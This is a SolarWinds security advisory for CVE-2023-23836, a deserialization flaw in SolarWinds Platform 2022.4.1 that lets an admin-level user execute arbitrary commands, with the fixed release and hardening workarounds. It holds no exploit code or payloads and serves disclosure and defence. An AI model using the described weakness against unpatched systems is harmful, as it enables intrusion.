        *   IT Service Management
        *   IT Automation
        *   Compliance
        *   Remote Infrastructure Management
        *   Hybrid Systems Monitoring
        *   Secure Remote Access
    *   BY INDUSTRY
        *   Small Business
        *   Enterprise
        *   Education
        *   Public Sector
    *   BY TECHNOLOGY
        *   Azure
        *   Active Directory
        *   Cisco
        *   Office 365
        *   MySQL
        *   SQL Diagnostic
*   Support
    *   Renew Maintenance
        *   Renew Maintenance
        *   Learn about Auto-Renewal
    *   Access the Success Center
        *   Access the Success Center
        *   Onboarding/Deployment Services
        *   Premium Support Offerings
    *   Technical Support
        *   Americas: +1-512-682-9300
        *   EMEA: +353 21 5002900
        *   APAC: +65 6593 7600
        *   Submit a Ticket
        *   Supported Versions
        *   End of Life Policy
        *   End of Life Policy for SaaS Products
    *   Training & Certification
        *   SolarWinds Academy
        *   SolarWinds Certified Professional
    *   Customer Portal
        *   Access the Customer Portal
*   Community
    *   THWACK
        *   View THWACK
    *   Orange Matter
        *   View Orange Matter
    *   LogicalRead Blog
        *   View LogicalRead Blog
    *   Secure by Design Resource Center
        *   View Resources
*   FREE TRIALS
    
*   Contact Sales
    
*   Online Quote
    
*   View All Products View Free Tools

SolarWinds Platform Deserialization of Untrusted Data Vulnerability (CVE-2023-23836)

**Summary**

SolarWinds Platform version 2022.4.1 was found to be susceptible to the Deserialization of Untrusted Data. This vulnerability allows a remote adversary with Orion admin-level account access to the SolarWinds Web Console to execute arbitrary commands.

**Affected Products**

*   SolarWinds Platform 2022.4.1

**Fixed Software Release**

*   SolarWinds Platform 2023.1

**Acknowledgments**

*   Piotr Bazydlo (@chudypb) of Trend Micro Zero Day Initiative

**Advisory Details**

**First Published**

02/15/2023

**Fixed Version**

SolarWinds Platform 2023.1

**Workarounds**

SolarWinds recommends customers upgrade to SolarWinds Platform version 2023.1 as soon as it becomes available. The expected release is by the end of February 2023. SolarWinds also recommends customers to follow the guidance provided in the SolarWinds Secure Configuration Guide, and ensure only authorized users can access the SolarWinds Platform. Special attention should be given to the following points from the documentation:

*   Be careful not to expose your SolarWinds Platform website on the public internet. If you must enable outbound internet access from SolarWinds servers, create a strict allow list and block all other traffic. See SolarWinds Platform Product Features Affected by Internet Access.
*   Disable unnecessary ports, protocols, and services on your host operating system and on applications like SQL Server. For more details, see the SolarWinds Port Requirements guide and Best practices for configuring Windows Defender Firewall (© 2023 Microsoft, available at https://docs.microsoft.com, obtained on January 10, 2023.)
*   Apply proper segmentation controls on the network where you have deployed the SolarWinds Platform and SQL Server instances.
*   Configure the firewall for the main polling engine to limit and restrict all inbound and outbound access for port 5671. Port 5671 should only communicate to your other SolarWinds Servers (in case of High Availability, both Active and Standby Primary Polling Engine Servers). You can check these by querying the Orion Servers table in the SolarWinds Platform database. Ensure this rule is updated when the configuration of SolarWinds Platform changes, for example, when you add new servers.

We’re Geekbuilt.®

Developed by network and systems engineers who know what it takes to manage today's dynamic IT environments, SolarWinds has a deep connection to the IT community.

The result? IT management products that are effective, accessible, and easy to use.

© 2023 SolarWinds Worldwide, LLC. All rights reserved.

Tag

#sql